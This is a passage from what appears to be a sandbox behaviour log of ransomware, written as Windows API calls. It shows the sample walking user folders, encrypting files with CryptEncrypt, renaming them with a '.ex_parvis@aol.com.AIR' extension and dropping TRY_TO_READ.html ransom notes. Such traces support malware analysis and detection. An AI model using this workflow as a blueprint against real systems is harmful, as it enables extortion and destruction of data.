dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.765] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.767] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.767] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.767] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd6b22, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd6b22, lpOverlapped=0x0) returned 1 [0169.891] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xb1bc0c50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1bc0c50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b21e8 [0169.891] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.891] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.891] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", dwFileAttributes=0x80) returned 1 [0169.892] lstrlenW (lpString="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 71 [0169.892] GetProcessHeap () returned 0x2e0000 [0169.892] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x319788 [0169.892] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" [0169.892] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.AIR" [0169.892] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.894] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5dc [0169.894] GetProcessHeap () returned 0x2e0000 [0169.894] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.894] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9699328) returned 1 [0169.894] SetFilePointer (in: hFile=0x5dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x940000 [0169.894] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.894] GetProcessHeap () returned 0x2e0000 [0169.894] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.895] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.895] WriteFile (in: hFile=0x5dc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.896] WriteFile (in: hFile=0x5dc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.896] WriteFile (in: hFile=0x5dc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.896] ReadFile (in: hFile=0x5dc, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x940000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x940000, lpOverlapped=0x0) returned 1 [0170.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0170.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0170.632] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", dwFileAttributes=0x80) returned 1 [0170.633] lstrlenW (lpString="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 53 [0170.633] GetProcessHeap () returned 0x2e0000 [0170.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0170.633] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" [0170.633] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0170.633] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0170.635] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5dc [0170.635] GetProcessHeap () returned 0x2e0000 [0170.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0170.635] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=171) returned 1 [0170.635] SetFilePointer (in: hFile=0x5dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xab [0170.635] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0170.636] GetProcessHeap () returned 0x2e0000 [0170.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0170.636] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0170.636] WriteFile (in: hFile=0x5dc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0170.637] WriteFile (in: hFile=0x5dc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0170.637] WriteFile (in: hFile=0x5dc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0170.637] ReadFile (in: hFile=0x5dc, lpBuffer=0x33b1c0, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b1c0*, lpNumberOfBytesRead=0x2acf9c8*=0xab, lpOverlapped=0x0) returned 1 [0170.637] SetFilePointer (in: hFile=0x5dc, lDistanceToMove=-171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.637] WriteFile (in: hFile=0x5dc, lpBuffer=0x33b330*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b330*, lpNumberOfBytesWritten=0x2acf9c8*=0xab, lpOverlapped=0x0) returned 1 [0170.638] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb1bc0c50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1bc0c50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2228 [0170.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0170.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0170.638] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", dwFileAttributes=0x80) returned 1 [0170.640] lstrlenW (lpString="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 50 [0170.640] GetProcessHeap () returned 0x2e0000 [0170.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0170.641] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" | out: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" [0170.641] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.12781717671972518758.ex_parvis@aol.com.AIR" [0170.641] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0170.643] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0170.643] GetProcessHeap () returned 0x2e0000 [0170.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0170.643] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=26246026) returned 1 [0170.643] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1907b8a [0170.643] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0170.643] GetProcessHeap () returned 0x2e0000 [0170.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0170.643] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0170.644] WriteFile (in: hFile=0x5e0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0170.647] WriteFile (in: hFile=0x5e0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0170.647] WriteFile (in: hFile=0x5e0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0170.648] ReadFile (in: hFile=0x5e0, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1907b8a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1907b8a, lpOverlapped=0x0) returned 1 [0172.923] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0172.923] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0172.923] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0172.924] lstrlenW (lpString="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 49 [0172.924] GetProcessHeap () returned 0x2e0000 [0172.924] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc8) returned 0x319788 [0172.924] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" [0172.924] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0172.924] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0172.944] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0172.944] GetProcessHeap () returned 0x2e0000 [0172.944] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0172.944] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0172.944] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0172.945] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0172.945] GetProcessHeap () returned 0x2e0000 [0172.945] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0172.945] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0172.945] WriteFile (in: hFile=0x5e0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0172.946] WriteFile (in: hFile=0x5e0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0172.946] WriteFile (in: hFile=0x5e0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0172.946] ReadFile (in: hFile=0x5e0, lpBuffer=0x319788, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0172.947] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.947] WriteFile (in: hFile=0x5e0, lpBuffer=0x32f868*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0172.947] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4d978f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2268 [0172.947] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e4 [0172.950] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e4 [0172.952] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4d978f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4d978f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0172.953] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4d978f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b22a8 [0172.953] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0172.956] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4d978f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b22e8 [0172.957] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4d978f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2328 [0172.957] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0172.959] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\crashreports\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0172.961] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4d978f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0xb4d978f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4dbda50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, 